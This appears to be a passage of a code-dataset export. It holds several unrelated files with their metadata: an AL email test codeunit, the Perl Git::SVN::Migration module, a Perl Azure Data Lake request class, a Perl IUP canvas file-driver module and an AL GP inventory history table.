// [Scenario] When an error occurs on the subscriber it does not propagate up the stack and the notification is sent only once
PermissionsMock.Set('Email Edit');
TestClientType.SetClientType(ClientType::Background);
BindSubscription(TestClientType);
BindSubscription(EmailTest);
EmailTest.ThrowErrorOnAfterSendEmail();
// [Given] An email message and an email account
CreateEmail(EmailMessage);
Assert.IsTrue(EmailMessage.Get(EmailMessage.GetId()), 'The email should exist');
ConnectorMock.Initialize();
ConnectorMock.AddAccount(EmailAccount);
// [When] The email is Sent
Email.Send(EmailMessage, EmailAccount);
// [Then] An event is fired to notify for the status of the email
EmailTest.DequeueVariable(Variable);
MessageID := Variable;
EmailTest.DequeueVariable(Variable);
Status := Variable;
// [Then] The event was fired once
EmailTest.AssertVariableStorageEmpty();
Assert.AreEqual(MessageID, EmailMessage.GetId(), 'A different Email was expected');
Assert.IsTrue(Status, 'The email should have been sent');
EmailOutbox.SetRange("Message Id", EmailMessage.GetId());
Assert.IsTrue(EmailOutbox.IsEmpty(), 'Email outbox should have been deleted.');
UnBindSubscription(EmailTest);
UnBindSubscription(TestClientType);
end;
[Test]
procedure ResendSentEmailFromAnotherUserTest()
var
SentEmail: Record "Sent Email";
Any: Codeunit Any;
EmailViewer: Codeunit "Email Viewer";
begin
// Create a sent email
PermissionsMock.Set('Email Edit');
SentEmail.Init();
SentEmail.Description := CopyStr(Any.UnicodeText(50), 1, MaxStrLen(SentEmail.Description));
SentEmail."Date Time Sent" := CurrentDateTime();
SentEmail."User Security Id" := CreateGuid(); // Created by another user
SentEmail.Insert();
asserterror EmailViewer.Resend(SentEmail);
Assert.ExpectedError(EmailMessageOpenPermissionErr);
asserterror EmailViewer.EditAndSend(SentEmail);
Assert.ExpectedError(EmailMessageOpenPermissionErr);
end;
[Test]
procedure GetSourceRecordInOutbox()
var
SourceEmailOutbox, EmailOutbox : Record "Email Outbox";
TempEmailOutbox: Record "Email Outbox" temporary;
EmailMessage: Codeunit "Email Message";
Any: Codeunit Any;
EmailTest: Codeunit "Email Test";
MessageIds: List of [Guid];
SystemId: Guid;
TableId: Integer;
NumberOfEmails, i : Integer;
begin
BindSubscription(EmailTest);
PermissionsMock.Set('Email Edit');
EmailOutbox.DeleteAll();
// [Scenario] Emails with source document, GetEmailOutboxForRecord procedure will return Outbox Emails
// [Given] Source Record - Email Outbox used as a source record for test email
CreateEmail(EmailMessage);
Email.SaveAsDraft(EmailMessage, SourceEmailOutbox);
TableId := Database::"Email Outbox";
SystemId := SourceEmailOutbox.SystemId;
// [When] Several emails are created and saved as draft
NumberOfEmails := Any.IntegerInRange(2, 5);
for i := 1 to NumberOfEmails do begin
Clear(EmailOutbox);
CreateEmailWithSource(EmailMessage, TableId, SystemId);
Email.SaveAsDraft(EmailMessage, EmailOutbox);
MessageIds.Add(EmailMessage.GetId());
end;
// [Then] GetEmailOutboxForRecord procedure return related Email Outbox
Email.GetEmailOutboxForRecord(SourceEmailOutbox, TempEmailOutbox);
Assert.AreEqual(NumberOfEmails, TempEmailOutbox.Count(), 'Email Outbox count is not equal to Number of Emails created.');
for i := 1 to NumberOfEmails do begin
TempEmailOutbox.SetCurrentKey("Message Id");
TempEmailOutbox.SetRange("Message Id", MessageIds.Get(i));
Assert.AreEqual(1, TempEmailOutbox.Count(), 'Did not find the email in Email Outbox');
end;
end;
[Test]
procedure GetEmailOutboxRecordStatus()
var
EmailOutbox: Record "Email Outbox";
EmailMessage: Codeunit "Email Message";
Any: Codeunit Any;
EmailTest: Codeunit "Email Test";
EmailStatus: Enum "Email Status";
TableId: Integer;
SystemId: Guid;
begin
BindSubscription(EmailTest);
PermissionsMock.Set('Email Edit');
// [Scenario] Emails with source document, GetOutboxEmailRecordStatus will return Outbox Email Status
// [Given] An Email with table id and source system id
TableId := Any.IntegerInRange(1, 10000);
SystemId := Any.GuidValue();
// [When] The email is created and saved as draft
CreateEmailWithSource(EmailMessage, TableId, SystemId);
// [When] The email is created and saved as draft
Email.SaveAsDraft(EmailMessage, EmailOutbox);
// [Then] Email Status of created Email Outbox record is equal to GetOutboxEmailRecordStatus result
EmailStatus := Email.GetOutboxEmailRecordStatus(EmailOutbox."Message Id");
Assert.AreEqual(EmailStatus, EmailOutbox.Status, 'Email Status should be the same as on Email Outbox record');
end;
[Test]
procedure GetSentEmailsForRecordByVariant()
var
SentEmail: Record "Sent Email";
TempSentEmail: Record "Sent Email" temporary;
EmailAccount: Record "Email Account";
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
Any: Codeunit Any;
SystemId: Guid;
TableId, NumberOfEmails, i : Integer;
MessageIds: List of [Guid];
begin
// [Scenario] When successfuly sending an email with source, GetSentEmailsForRecord return related Sent Emails.
PermissionsMock.Set('Email Edit');
SentEmail.DeleteAll();
// [Given] An email with source and an email account
ConnectorMock.Initialize();
ConnectorMock.AddAccount(EmailAccount);
TableId := Database::"Email Account";
SystemId := EmailAccount.SystemId;
NumberOfEmails := Any.IntegerInRange(2, 5);
for i := 1 to NumberOfEmails do begin
CreateEmailWithSource(EmailMessage, TableId, SystemId);
Assert.IsTrue(EmailMessage.Get(EmailMessage.GetId()), 'The email should exist');
MessageIds.Add(EmailMessage.GetId());
// [When] The email is Sent
Assert.IsTrue(Email.Send(EmailMessage, EmailAccount), 'Sending an email should have succeeded');
end;
// [Then] GetSentEmailsForRecord procedure return related Sent Email records
Email.GetSentEmailsForRecord(EmailAccount, TempSentEmail);
Assert.AreEqual(NumberOfEmails, TempSentEmail.Count(), 'Sent Emails count is not equal to Number of Emails sent.');
for i := 1 to NumberOfEmails do begin
TempSentEmail.SetCurrentKey("Message Id");
TempSentEmail.SetRange("Message Id", MessageIds.Get(i));
Assert.AreEqual(1, TempSentEmail.Count(), 'Did not find the email in Sent Emails ');
end;
end;
local procedure CreateEmail(var EmailMessage: Codeunit "Email Message")
var
Any: Codeunit Any;
begin
EmailMessage.Create(Any.Email(), Any.UnicodeText(50), Any.UnicodeText(250), true);
end;
local procedure CreateEmailWithSource(var EmailMessage: Codeunit "Email Message"; TableId: Integer; SystemId: Guid)
var
Any: Codeunit Any;
begin
EmailMessage.Create(Any.Email(), Any.UnicodeText(50), Any.UnicodeText(250), true);
Email.AddRelation(EmailMessage, TableId, SystemId, Enum::"Email Relation Type"::"Primary Source", Enum::"Email Relation Origin"::"Compose Context");
end;
[StrMenuHandler]
[Scope('OnPrem')]
procedure CloseEmailEditorHandler(Options: Text[1024]; var Choice: Integer; Instruction: Text[1024])
begin
Choice := 1;
end;
[StrMenuHandler]
[Scope('OnPrem')]
procedure OnEmailEditorClose(Options: Text[1024]; var Choice: Integer; Instruction: Text[1024])
begin
Assert.AreEqual(InstructionTxt, Instruction, 'Wrong message when closing email editor');
Assert.AreEqual(OptionsOnClosePageTxt, Options, 'Wrong options when closing the email editor');
Choice := OptionChoice;
end;
[ModalPageHandler]
procedure RelationPickerHandler(var EmailRelationPickerTestPage: TestPage "Email Relation Picker")
begin
Assert.AreEqual(EmailRelationPickerTestPage."Relation Type".Value(), 'Primary Source', 'No source found on email relation picker page');
ClearLastError();
EmailRelationPickerTestPage."Source Name".Lookup();
Assert.AreEqual('', GetLastErrorText, 'An error occured - opening email relation from picker');
end;
[ModalPageHandler]
procedure RelatedAttachmentsHandler(var RelatedAttachmentsPage: TestPage "Email Related Attachments")
var
SourceLabel: Variant;
begin
RelatedAttachmentsPage.First();
DequeueVariable(SourceLabel);
Assert.AreEqual('Attachment1', RelatedAttachmentsPage.FileName.Value(), 'Wrong Attachment');
Assert.AreEqual(SourceLabel, RelatedAttachmentsPage.Source.Value(), 'Wrong Attachment');
RelatedAttachmentsPage.OK().Invoke();
end;
[ModalPageHandler]
procedure EmailEditorHandler(var EmailEditor: TestPage "Email Editor")
begin
Assert.IsTrue(EmailEditor.Account.Enabled(), 'Account field was not enabled');
Assert.IsTrue(EmailEditor.ToField.Editable(), 'To field was not editable');
Assert.IsTrue(EmailEditor.CcField.Editable(), 'Cc field was not editable');
Assert.IsTrue(EmailEditor.BccField.Editable(), 'Bcc field was not editable');
Assert.IsTrue(EmailEditor.SubjectField.Editable(), 'Subject field was not editable');
Assert.IsTrue(EmailEditor.BodyField.Editable(), 'Body field was not editable');
#if not CLEAN19
Assert.IsTrue(EmailEditor.Upload.Enabled(), 'Upload Action was not enabled.');
#else
Assert.IsTrue(EmailEditor.Attachments.Upload.Visible(), 'Upload Action is not visible.');
#endif
Assert.IsTrue(EmailEditor.Send.Enabled(), 'Send Action was not enabled.');
end;
[ModalPageHandler]
procedure SendEmailEditorHandler(var EmailEditor: TestPage "Email Editor")
begin
EmailEditorHandler(EmailEditor);
EmailEditor.Send.Invoke();
end;
[ModalPageHandler]
procedure DiscardEmailEditorHandler(var EmailEditor: TestPage "Email Editor")
begin
EmailEditorHandler(EmailEditor);
EmailEditor.Discard.Invoke();
end;
[ConfirmHandler]
procedure ConfirmYes(Question: Text[1024]; var Reply: Boolean);
begin
Assert.AreEqual(DiscardEmailQst, Question, 'Wrong confirmation question');
Reply := true;
end;
[EventSubscriber(ObjectType::Codeunit, Codeunit::Email, 'OnAfterSendEmail', '', true, true)]
local procedure OnAfterSendEmailSubscriber(MessageId: Guid; Status: Boolean)
begin
VariableStorage.Enqueue(MessageId);
VariableStorage.Enqueue(Status);
if ThrowError then
Error('');
end;
[EventSubscriber(ObjectType::Codeunit, Codeunit::Email, 'OnShowSource', '', true, true)]
local procedure OnShowSourceSubscriber(SourceTableId: Integer; SourceSystemId: Guid; var IsHandled: Boolean)
begin
IsHandled := true;
end;
[EventSubscriber(ObjectType::Codeunit, Codeunit::Email, 'OnFindRelatedAttachments', '', true, true)]
local procedure OnFindRelatedAttachments(SourceTableId: Integer; SourceSystemID: Guid; var EmailRelatedAttachments: Record "Email Related Attachment")
var
Any: Codeunit Any;
begin
EmailRelatedAttachments."Attachment Name" := 'Attachment1';
EmailRelatedAttachments."Attachment Table ID" := Any.IntegerInRange(1000);
EmailRelatedAttachments."Attachment System ID" := System.CreateGuid();
EmailRelatedAttachments.Insert();
end;
[EventSubscriber(ObjectType::Codeunit, Codeunit::Email, 'OnGetAttachment', '', true, true)]
local procedure OnGetAttachment(AttachmentTableID: Integer; AttachmentSystemID: Guid; MessageID: Guid)
var
EmailMessage: Codeunit "Email Message";
begin
EmailMessage.Get(MessageID);
EmailMessage.AddAttachment('Attachment1', 'text/plain', Base64Convert.ToBase64('Content'));
end;
procedure ThrowErrorOnAfterSendEmail()
begin
ThrowError := true;
end;
procedure DequeueVariable(var Variable: Variant)
begin
VariableStorage.Dequeue(Variable);
end;
procedure AssertVariableStorageEmpty()
begin
VariableStorage.AssertEmpty();
end;
var
VariableStorage: Codeunit "Library - Variable Storage";
InstructionTxt: Label 'The email has not been sent.';
OptionsOnClosePageTxt: Label 'Keep as draft in Email Outbox,Discard email';
DiscardEmailQst: Label 'Go ahead and discard?';
OptionChoice: Integer;
ThrowError: Boolean;
} | 43.057605 | 297 | 0.675711 |
ed96ac593e8098fcdf93a8a7b9639ae1a2734c73 | 8,196 | pm | Perl | Windows/prompt/cmder/vendor/git-for-windows/mingw64/share/perl5/Git/SVN/Migration.pm | Brunohdp/Alura-Extras | 362e3ba6eeb31a3a34d182c8190b29733875bd3e | [
"MIT"
] | null | null | null | Windows/prompt/cmder/vendor/git-for-windows/mingw64/share/perl5/Git/SVN/Migration.pm | Brunohdp/Alura-Extras | 362e3ba6eeb31a3a34d182c8190b29733875bd3e | [
"MIT"
] | 5 | 2021-03-11T07:45:51.000Z | 2022-02-14T01:26:11.000Z | Windows/prompt/cmder/vendor/git-for-windows/mingw64/share/perl5/Git/SVN/Migration.pm | Brunohdp/Alura-Extras | 362e3ba6eeb31a3a34d182c8190b29733875bd3e | [
"MIT"
] | 4 | 2021-12-01T19:21:28.000Z | 2021-12-16T12:12:20.000Z | package Git::SVN::Migration;
# these version numbers do NOT correspond to actual version numbers
# of git or git-svn. They are just relative.
#
# v0 layout: .git/$id/info/url, refs/heads/$id-HEAD
#
# v1 layout: .git/$id/info/url, refs/remotes/$id
#
# v2 layout: .git/svn/$id/info/url, refs/remotes/$id
#
# v3 layout: .git/svn/$id, refs/remotes/$id
# - info/url may remain for backwards compatibility
# - this is what we migrate up to this layout automatically,
# - this will be used by git svn init on single branches
# v3.1 layout (auto migrated):
# - .rev_db => .rev_db.$UUID, .rev_db will remain as a symlink
# for backwards compatibility
#
# v4 layout: .git/svn/$repo_id/$id, refs/remotes/$repo_id/$id
# - this is only created for newly multi-init-ed
# repositories. Similar in spirit to the
# --use-separate-remotes option in git-clone (now default)
# - we do not automatically migrate to this (following
# the example set by core git)
#
# v5 layout: .rev_db.$UUID => .rev_map.$UUID
# - newer, more-efficient format that uses 24-bytes per record
# with no filler space.
# - use xxd -c24 < .rev_map.$UUID to view and debug
# - This is a one-way migration, repositories updated to the
# new format will not be able to use old git-svn without
# rebuilding the .rev_db. Rebuilding the rev_db is not
# possible if noMetadata or useSvmProps are set; but should
# be no problem for users that use the (sensible) defaults.
use strict;
use warnings $ENV{GIT_PERL_FATAL_WARNINGS} ? qw(FATAL all) : ();
use Carp qw/croak/;
use File::Path qw/mkpath/;
use File::Basename qw/dirname basename/;
our $_minimize;
use Git qw(
command
command_noisy
command_output_pipe
command_close_pipe
command_oneline
);
use Git::SVN;
sub migrate_from_v0 {
my $git_dir = $ENV{GIT_DIR};
return undef unless -d $git_dir;
my ($fh, $ctx) = command_output_pipe(qw/rev-parse --symbolic --all/);
my $migrated = 0;
while (<$fh>) {
chomp;
my ($id, $orig_ref) = ($_, $_);
next unless $id =~ s#^refs/heads/(.+)-HEAD$#$1#;
my $info_url = command_oneline(qw(rev-parse --git-path),
"$id/info/url");
next unless -f $info_url;
my $new_ref = "refs/remotes/$id";
if (::verify_ref("$new_ref^0")) {
print STDERR "W: $orig_ref is probably an old ",
"branch used by an ancient version of ",
"git-svn.\n",
"However, $new_ref also exists.\n",
"We will not be able ",
"to use this branch until this ",
"ambiguity is resolved.\n";
next;
}
print STDERR "Migrating from v0 layout...\n" if !$migrated;
print STDERR "Renaming ref: $orig_ref => $new_ref\n";
command_noisy('update-ref', $new_ref, $orig_ref);
command_noisy('update-ref', '-d', $orig_ref, $orig_ref);
$migrated++;
}
command_close_pipe($fh, $ctx);
print STDERR "Done migrating from v0 layout...\n" if $migrated;
$migrated;
}
sub migrate_from_v1 {
my $git_dir = $ENV{GIT_DIR};
my $migrated = 0;
return $migrated unless -d $git_dir;
my $svn_dir = Git::SVN::svn_dir();
# just in case somebody used 'svn' as their $id at some point...
return $migrated if -d $svn_dir && ! -f "$svn_dir/info/url";
print STDERR "Migrating from a git-svn v1 layout...\n";
mkpath([$svn_dir]);
print STDERR "Data from a previous version of git-svn exists, but\n\t",
"$svn_dir\n\t(required for this version ",
"($::VERSION) of git-svn) does not exist.\n";
my ($fh, $ctx) = command_output_pipe(qw/rev-parse --symbolic --all/);
while (<$fh>) {
my $x = $_;
next unless $x =~ s#^refs/remotes/##;
chomp $x;
my $info_url = command_oneline(qw(rev-parse --git-path),
"$x/info/url");
next unless -f $info_url;
my $u = eval { ::file_to_s($info_url) };
next unless $u;
my $dn = dirname("$svn_dir/$x");
mkpath([$dn]) unless -d $dn;
if ($x eq 'svn') { # they used 'svn' as GIT_SVN_ID:
mkpath(["$svn_dir/svn"]);
print STDERR " - $git_dir/$x/info => ",
"$svn_dir/$x/info\n";
rename "$git_dir/$x/info", "$svn_dir/$x/info" or
croak "$!: $x";
# don't worry too much about these, they probably
# don't exist with repos this old (save for index,
# and we can easily regenerate that)
foreach my $f (qw/unhandled.log index .rev_db/) {
rename "$git_dir/$x/$f", "$svn_dir/$x/$f";
}
} else {
print STDERR " - $git_dir/$x => $svn_dir/$x\n";
rename "$git_dir/$x", "$svn_dir/$x" or croak "$!: $x";
}
$migrated++;
}
command_close_pipe($fh, $ctx);
print STDERR "Done migrating from a git-svn v1 layout\n";
$migrated;
}
sub read_old_urls {
my ($l_map, $pfx, $path) = @_;
my @dir;
foreach (<$path/*>) {
if (-r "$_/info/url") {
$pfx .= '/' if $pfx && $pfx !~ m!/$!;
my $ref_id = $pfx . basename $_;
my $url = ::file_to_s("$_/info/url");
$l_map->{$ref_id} = $url;
} elsif (-d $_) {
push @dir, $_;
}
}
my $svn_dir = Git::SVN::svn_dir();
foreach (@dir) {
my $x = $_;
$x =~ s!^\Q$svn_dir\E/!!o;
read_old_urls($l_map, $x, $_);
}
}
sub migrate_from_v2 {
my @cfg = command(qw/config -l/);
return if grep /^svn-remote\..+\.url=/, @cfg;
my %l_map;
read_old_urls(\%l_map, '', Git::SVN::svn_dir());
my $migrated = 0;
require Git::SVN;
foreach my $ref_id (sort keys %l_map) {
eval { Git::SVN->init($l_map{$ref_id}, '', undef, $ref_id) };
if ($@) {
Git::SVN->init($l_map{$ref_id}, '', $ref_id, $ref_id);
}
$migrated++;
}
$migrated;
}
sub minimize_connections {
require Git::SVN;
require Git::SVN::Ra;
my $r = Git::SVN::read_all_remotes();
my $new_urls = {};
my $root_repos = {};
foreach my $repo_id (keys %$r) {
my $url = $r->{$repo_id}->{url} or next;
my $fetch = $r->{$repo_id}->{fetch} or next;
my $ra = Git::SVN::Ra->new($url);
# skip existing cases where we already connect to the root
if (($ra->url eq $ra->{repos_root}) ||
($ra->{repos_root} eq $repo_id)) {
$root_repos->{$ra->url} = $repo_id;
next;
}
my $root_ra = Git::SVN::Ra->new($ra->{repos_root});
my $root_path = $ra->url;
$root_path =~ s#^\Q$ra->{repos_root}\E(/|$)##;
foreach my $path (keys %$fetch) {
my $ref_id = $fetch->{$path};
my $gs = Git::SVN->new($ref_id, $repo_id, $path);
# make sure we can read when connecting to
# a higher level of a repository
my ($last_rev, undef) = $gs->last_rev_commit;
if (!defined $last_rev) {
$last_rev = eval {
$root_ra->get_latest_revnum;
};
next if $@;
}
my $new = $root_path;
$new .= length $path ? "/$path" : '';
eval {
$root_ra->get_log([$new], $last_rev, $last_rev,
0, 0, 1, sub { });
};
next if $@;
$new_urls->{$ra->{repos_root}}->{$new} =
{ ref_id => $ref_id,
old_repo_id => $repo_id,
old_path => $path };
}
}
my @emptied;
foreach my $url (keys %$new_urls) {
# see if we can re-use an existing [svn-remote "repo_id"]
# instead of creating a(n ugly) new section:
my $repo_id = $root_repos->{$url} || $url;
my $fetch = $new_urls->{$url};
foreach my $path (keys %$fetch) {
my $x = $fetch->{$path};
Git::SVN->init($url, $path, $repo_id, $x->{ref_id});
my $pfx = "svn-remote.$x->{old_repo_id}";
my $old_fetch = quotemeta("$x->{old_path}:".
"$x->{ref_id}");
command_noisy(qw/config --unset/,
"$pfx.fetch", '^'. $old_fetch . '$');
delete $r->{$x->{old_repo_id}}->
{fetch}->{$x->{old_path}};
if (!keys %{$r->{$x->{old_repo_id}}->{fetch}}) {
command_noisy(qw/config --unset/,
"$pfx.url");
push @emptied, $x->{old_repo_id}
}
}
}
if (@emptied) {
my $file = $ENV{GIT_CONFIG} ||
command_oneline(qw(rev-parse --git-path config));
print STDERR <<EOF;
The following [svn-remote] sections in your config file ($file) are empty
and can be safely removed:
EOF
print STDERR "[svn-remote \"$_\"]\n" foreach @emptied;
}
}
sub migration_check {
migrate_from_v0();
migrate_from_v1();
migrate_from_v2();
minimize_connections() if $_minimize;
}
1;
| 30.81203 | 73 | 0.592484 |
ed78b9f95b36aaf25f5a8e239ff63f2224df6aca | 1,036 | pm | Perl | auto-lib/Azure/DataLakeAnalyticsData/GetPackageCatalog.pm | pplu/azure-sdk-perl | 26cbef2d926f571bc1617c26338c106856f95568 | [
"Apache-2.0"
] | null | null | null | auto-lib/Azure/DataLakeAnalyticsData/GetPackageCatalog.pm | pplu/azure-sdk-perl | 26cbef2d926f571bc1617c26338c106856f95568 | [
"Apache-2.0"
] | null | null | null | auto-lib/Azure/DataLakeAnalyticsData/GetPackageCatalog.pm | pplu/azure-sdk-perl | 26cbef2d926f571bc1617c26338c106856f95568 | [
"Apache-2.0"
] | 1 | 2021-04-08T15:26:39.000Z | 2021-04-08T15:26:39.000Z | package Azure::DataLakeAnalyticsData::GetPackageCatalog;
use Moose;
use MooseX::ClassAttribute;
has 'api_version' => (is => 'ro', required => 1, isa => 'Str', default => '2016-11-01',
traits => [ 'Azure::ParamInQuery', 'Azure::LocationInResponse' ], location => 'api-version',
);
has 'databaseName' => (is => 'ro', required => 1, isa => 'Str',
traits => [ 'Azure::ParamInPath' ],
);
has 'packageName' => (is => 'ro', required => 1, isa => 'Str',
traits => [ 'Azure::ParamInPath' ],
);
has 'schemaName' => (is => 'ro', required => 1, isa => 'Str',
traits => [ 'Azure::ParamInPath' ],
);
class_has _api_uri => (is => 'ro', default => '/catalog/usql/databases/{databaseName}/schemas/{schemaName}/packages/{packageName}');
class_has _returns => (is => 'ro', isa => 'HashRef', default => sub { {
200 => 'Azure::DataLakeAnalyticsData::GetPackageCatalogResult',
} });
class_has _is_async => (is => 'ro', default => 0);
class_has _api_method => (is => 'ro', default => 'GET');
1;
| 38.37037 | 134 | 0.590734 |
eda9fdb2a4e6cad9eebc7c46c22243627e26f6bd | 6,429 | pm | Perl | lib/IUP/Canvas/FileVector.pm | kmx/perl-iup | 0178f76a39f01f750e1406f01c3c2d84a3a48ea9 | [
"MIT",
"Unlicense"
] | 5 | 2015-02-10T02:29:10.000Z | 2020-02-24T18:39:15.000Z | lib/IUP/Canvas/FileVector.pm | kmx/perl-iup | 0178f76a39f01f750e1406f01c3c2d84a3a48ea9 | [
"MIT",
"Unlicense"
] | 3 | 2015-04-03T11:55:20.000Z | 2021-03-06T15:27:56.000Z | lib/IUP/Canvas/FileVector.pm | kmx/perl-iup | 0178f76a39f01f750e1406f01c3c2d84a3a48ea9 | [
"MIT",
"Unlicense"
] | 2 | 2015-02-06T00:30:28.000Z | 2015-06-15T21:33:56.000Z | package IUP::Canvas::FileVector;
use strict;
use warnings;
use base qw(IUP::Internal::Canvas);
use IUP::Internal::LibraryIup;
use Carp;
sub new {
my ($class, %args) = @_;
my $format = $args{format};
my $filename = $args{filename};
my $width = $args{width};
my $height = $args{height};
my $resolution = $args{resolution};
my $dpi = $args{dpi};
my $ch;
if (!$filename) {
carp "warning: filename parameter not defined for ".__PACKAGE__."->new()";
}
elsif (!$format) {
carp "warning: format parameter not defined for ".__PACKAGE__."->new()";
}
elsif (defined $width && $width<0) {
carp "warning: width parameter is '<=0' for ".__PACKAGE__."->new()";
}
elsif (defined $height && $height<0) {
carp "warning: height parameter is '<=0' for ".__PACKAGE__."->new()";
}
elsif ((defined $width && !defined $height) || (!defined $width && defined $height)) {
carp "warning: none or both height and width parameters have to be defined for ".__PACKAGE__."->new()";
}
elsif (defined $dpi && defined $resolution) {
carp "warning: you cannot define both 'resolution' and 'dpi' parameters for ".__PACKAGE__."->new()";
}
elsif (defined $resolution && $resolution<0) {
carp "warning: resolution parameter is '<=0' for ".__PACKAGE__."->new()";
}
elsif (defined $dpi && $dpi<0) {
carp "warning: dpi parameter is '<=0' for ".__PACKAGE__."->new()";
}
else {
my $init;
$resolution = $dpi/25.4 if defined $dpi;
if ($format eq 'PS') { # http://www.tecgraf.puc-rio.br/cd/en/drv/ps.html
# "filename -p[paper] -w[width] -h[height] -l[left] -r[right] -b[bottom] -t[top] -s[resolution] [-e] [-g] [-o] [-1] -d[margin]"
# "%s -p%d -w%g -h%g -l%g -r%g -b%g -t%g -s%d -e -o -1 -g -d%g"
$init = $filename;
$init .= sprintf(" -w%g -h%g", $width, $height) if defined $width && defined $height;
$init .= sprintf(" -p%d", $args{paper}) if defined $args{paper};
$init .= sprintf(" -l%g", $args{left}) if defined $args{left};
$init .= sprintf(" -r%g", $args{right}) if defined $args{right};
$init .= sprintf(" -b%g", $args{top}) if defined $args{top};
$init .= sprintf(" -t%g", $args{bottom}) if defined $args{bottom};
$init .= sprintf(" -d%g", $args{margin}) if defined $args{margin};
$init .= sprintf(" -s%d", $resolution) if defined $resolution;
$init .= " -1" if defined $args{level1};
$init .= " -g" if defined $args{debug};
$init .= " -e" if defined $args{eps};
$init .= " -o" if defined $args{landscape};
}
elsif ($format eq 'SVG') { # http://www.tecgraf.puc-rio.br/cd/en/drv/svg.html
# "filename [widthxheight] [resolution]"
# "%s %gx%g %g"
$init = $filename;
$init .= sprintf(" %gx%g", $width, $height) if defined $width && defined $height;
$init .= sprintf(" %g", $resolution) if defined $resolution;
}
elsif ($format eq 'CGM') { # http://www.tecgraf.puc-rio.br/cd/en/drv/cgm.html
# "filename [widthxheight] [resolution] [-t] -p[precision]"
# "%s %gx%g %g %s"
$init = $filename;
$init .= sprintf(" %gx%g", $width, $height) if defined $width && defined $height;
$init .= sprintf(" %g", $resolution) if defined $resolution;
$init .= " -t" if defined $args{codification};
$init .= sprintf(" -p%d", $args{precision}) if defined $args{precision};
}
elsif ($format eq 'DEBUG') { # http://www.tecgraf.puc-rio.br/cd/en/drv/debug.html
# "filename [widthxheight] [resolution]"
# "%s %gx%g %g"
$init = $filename;
$init .= sprintf(" %gx%g", $width, $height) if defined $width && defined $height;
$init .= sprintf(" %g", $resolution) if defined $resolution;
}
elsif ($format eq 'DGN') { # http://www.tecgraf.puc-rio.br/cd/en/drv/dgn.html
# "filename [widthxheight] [resolution] [-f] [-sseedfile]"
# "%s %gx%g %g %s"
$init = $filename;
$init .= sprintf(" %gx%g", $width, $height) if defined $width && defined $height;
$init .= sprintf(" %g", $resolution) if defined $resolution;
$init .= " -f" if defined $args{filling};
$init .= sprintf(" -s%s", $args{seedfile}) if defined $args{seedfile};
}
elsif ($format eq 'DXF') { # http://www.tecgraf.puc-rio.br/cd/en/drv/dxf.html
# "filename [widthxheight] [resolution]"
# "%s %gx%g %g"
$init = $filename;
$init .= sprintf(" %gx%g", $width, $height) if defined $width && defined $height;
$init .= sprintf(" %g", $resolution) if defined $resolution;
}
elsif ($format eq 'EMF') { # http://www.tecgraf.puc-rio.br/cd/en/drv/emf.html
# "filename widthxheight"
# "%s %dx%d"
if (defined $width && defined $height) { #widthxheight - mandatory
$init = $filename;
$init .= sprintf(" %dx%d", $width, $height) if defined $width && defined $height;
}
else {
$init = '';
carp "warning: width and height are mandatory for format=>'EMF'";
}
}
elsif ($format eq 'METAFILE') { # http://www.tecgraf.puc-rio.br/cd/en/drv/mf.html
# "filename [widthxheight] [resolution]"
# "%s %gx%g %g"
$init = $filename;
$init .= sprintf(" %gx%g", $width, $height) if defined $width && defined $height;
$init .= sprintf(" %g", $resolution) if defined $resolution;
}
elsif ($format eq 'WMF') { # http://www.tecgraf.puc-rio.br/cd/en/drv/wmf.html
# "filename widthxheight [resolution]"
# "%s %dx%d %g"
if (defined $width && defined $height) { #widthxheight - mandatory
$init = $filename;
$init .= sprintf(" %dx%d", $width, $height) if defined $width && defined $height;
}
else {
$init = '';
carp "warning: width and height are mandatory for format=>'WMF'";
}
}
if (defined $init) {
if ($init ne '') {
$init .= " $args{raw}" if defined $args{raw};
#warn "XXX-DEBUG: type='$format' init='$init'\n";
$ch = $class->new_from_cnvhandle(IUP::Internal::Canvas::_cdCreateCanvas_BASIC($format, $init));
}
}
else {
carp "warning: unsupported format '$format' in ".__PACKAGE__."->new()";
}
}
return $ch;
}
1;
| 43.734694 | 135 | 0.552808 |
edae247cdd52280e75542b113fb62c3090d1604a | 1,946 | al | Perl | AddOns/DynamicsGPDataMigrationV2/app/src/History/Tab4129.GP_IVTrxDetailHist.al | daansaveyn/ALAppExtensions | 882d4d0eadd2fb49c405b1c05baf282114339c77 | [
"MIT"
] | 1 | 2021-08-16T18:14:49.000Z | 2021-08-16T18:14:49.000Z | AddOns/DynamicsGPDataMigrationV2/app/src/History/Tab4129.GP_IVTrxDetailHist.al | daansaveyn/ALAppExtensions | 882d4d0eadd2fb49c405b1c05baf282114339c77 | [
"MIT"
] | 3 | 2020-06-24T12:59:52.000Z | 2020-06-24T14:51:04.000Z | AddOns/DynamicsGPDataMigrationV2/app/src/History/Tab4129.GP_IVTrxDetailHist.al | daansaveyn/ALAppExtensions | 882d4d0eadd2fb49c405b1c05baf282114339c77 | [
"MIT"
] | 1 | 2020-07-30T12:20:36.000Z | 2020-07-30T12:20:36.000Z | table 4129 "GP_IVTrxDetailHist"
{
ReplicateData = false;
fields
{
field(1; DOCTYPE; Option)
{
Caption = 'Document Type';
OptionMembers = ,"Adjustment","Variance","Transfer","Receipt","Return","Sale","Assembly","Standard Cost Adjustment","Cost Adjustment via PO Edit Status","Cost Adjustment via PO Return","Cost Adjustment via PO Invoice Match","Cost Adjustment via PO Landed Cost Match","Cost Adjustment via PO Tax";
DataClassification = CustomerContent;
}
field(2; DOCNUMBR; text[22])
{
Caption = 'Document Number';
DataClassification = CustomerContent;
}
field(3; LNSEQNBR; Decimal)
{
Caption = 'Line SEQ Number';
DataClassification = CustomerContent;
}
field(4; DTLSEQNM; Integer)
{
Caption = 'Detail SEQ Number';
DataClassification = CustomerContent;
}
field(5; QTYTYPE; Option)
{
Caption = 'QTY Type';
OptionMembers = ,"On Hand","Returned","In Use","In Service","Damaged";
DataClassification = CustomerContent;
}
field(6; RCPTNMBR; text[22])
{
Caption = 'Receipt Number';
DataClassification = CustomerContent;
}
field(7; RCPTQTY; Decimal)
{
Caption = 'Receipt QTY';
DataClassification = CustomerContent;
}
field(8; RCPTEXCT; Decimal)
{
Caption = 'Receipt Extended Cost';
DataClassification = CustomerContent;
}
field(9; DEX_ROW_ID; Integer)
{
Caption = 'DEX_ROW_ID';
DataClassification = CustomerContent;
}
}
keys
{
key(PK; DOCTYPE, DOCNUMBR, LNSEQNBR, DTLSEQNM)
{
Clustered = false;
}
}
fieldgroups
{
}
}
| 29.044776 | 308 | 0.538541 |
